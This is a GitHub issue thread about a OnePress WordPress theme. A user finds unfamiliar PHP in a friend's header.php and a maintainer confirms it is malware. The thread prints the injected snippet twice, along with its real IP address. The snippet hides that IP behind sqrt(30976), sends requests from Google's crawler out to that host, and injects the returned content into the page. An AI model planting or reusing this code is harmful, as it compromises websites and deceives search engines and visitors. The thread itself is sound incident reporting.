### ISSUE TITLE
Strange code in the header.php file

### ISSUE THREAD

**Issue by ArnaudParan** [FameThemes/onepress#397]
Hello,

Sorry if I am not addressing this issue to the right person.
I wanted some indication. I have a friend which uses wordpress (and knows nothing about development) and had a php error saying that in the onepress/header.php file there is

```php

$_SERVER[HTTP_USER_AGENT]

```

which should be replaced by

```php

$_SERVER['HTTP_USER_AGENT']

```

She uses onepress v2.2.4

I did this action and solved the issue and came here to see your code and I didn't see that thing in your header.php file and while investigating your code, I found that you use the _SERVER hashmap the right way with the quotes.

If you have any idea, i show the sample of code which I did not see in v2.2.4 in git

```php

<?php $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if (strpos($botbotbot,"google")){$ch = curl_init();    $xxx = sqrt(30976);    curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]");       $result = curl_exec($ch);       curl_close ($ch);          echo $result;}?><?php

```

It is poorly formatted so I format it better for you

```php

<?php
$botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);        
$botbotbot = str_replace(" ", "-", $botbotbot);                
if (strpos($botbotbot,"google")) {        
    $ch = curl_init();             
    $xxx = sqrt(30976);                                                                                                               
    curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]");        
    $result = curl_exec($ch);           
    curl_close ($ch);        
    echo $result;        
} 
?>

```

I find it extremely strange that one programmer would write $xxx = sqrt(30976) and not just curl
http://176.31.253.227/cakes/

Furthermore, I tried to curl the url with garbage useragent and domain get parameters (with torify just in case), and got a 404 error from their apache server which I find even wierder.

I am not used to php, I am more of a C/asm/python/JS guy so I might not understand everything here, and I know absolutely nothing in Wordpress as if I would want to make a website I would just go for reactJS/django or some other framework in Go or anything.

Once again sorry if I posted in the wrong area, I am just confused because the code on the wordpress site did not match your code on github (just the part i wrote the rest was the same) and that code seems extremely strange and suspicious to me

Thanks for having taken your time to read me

**Comment by TruongTuyen** [comment]
Hi ArnaudParan,

In this case, your friend's website has been infected with malicious code, this code is not in our source code, it is used to send information to the hacker server. Please only use reputable themes and plugins.

Best regards

**Comment by ArnaudParan** [comment]
Hi TruongTuyen,

Thanks for your answer, that's what I thought was happening

Best regards too

**Comment by krupal1506** [comment]
Hi @ArnaudParan 

have you solved this malicious code from your site?
